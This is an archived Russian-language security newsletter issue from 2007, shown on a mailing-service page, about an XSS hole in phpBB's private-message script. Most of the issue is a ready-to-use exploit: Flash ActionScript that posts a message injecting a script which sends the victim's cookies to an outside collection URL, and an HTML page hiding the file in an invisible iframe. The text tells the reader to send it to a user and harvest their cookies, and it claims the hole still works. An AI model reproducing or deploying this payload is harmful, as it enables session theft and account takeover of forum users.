Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

  Январь 2007  
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
12.01.2007
00:55:06
07:05:13
13
14
15
15.01.2007
05:15:29
14:05:25
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Автор
Forester

Статистика

1.394 подписчиков
-1 за неделю
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в phpBB.


Компьютер для продвинутых пользователей
В этом выпуске:
phpBB
ПО: phpBB

Уязвимость:
Ввод данных в privmsg.php не проверяется до выполнения пользователем. Это может быть использовано для вставки HTML или скрипт-кода, которые смогут похитетть куки пользователя.
Использование:
Создаём Shockwave Flash файл с кодом:
var username:String = "user_that_doesnt_exist";
var subject:String = "Xss Exploitation";
var message:String = "</textarea><script>document.location= 'http://site.com/cookie.php?c=' + document.cookie </script>";
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";
getURL("http://victim.com/phpBB2/privmsg.php", "_self", "POST");
Вставляем внутри страницы:
<html>
<head>
<title>Вставляем некий заголовок
</head>
<body>
<p>Вставляем текст</p>
<iframe src="http://yoursite.com/exploit.swf" frameborder="0" height="0" width="0"></iframe>
</body>
</html>

Отправляем пользователю и получаем его куки.
Комментарий::
Уязвимсоть работаспособна на данный момент.
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru
Отблагодорить: WM - R407426923581
В избранное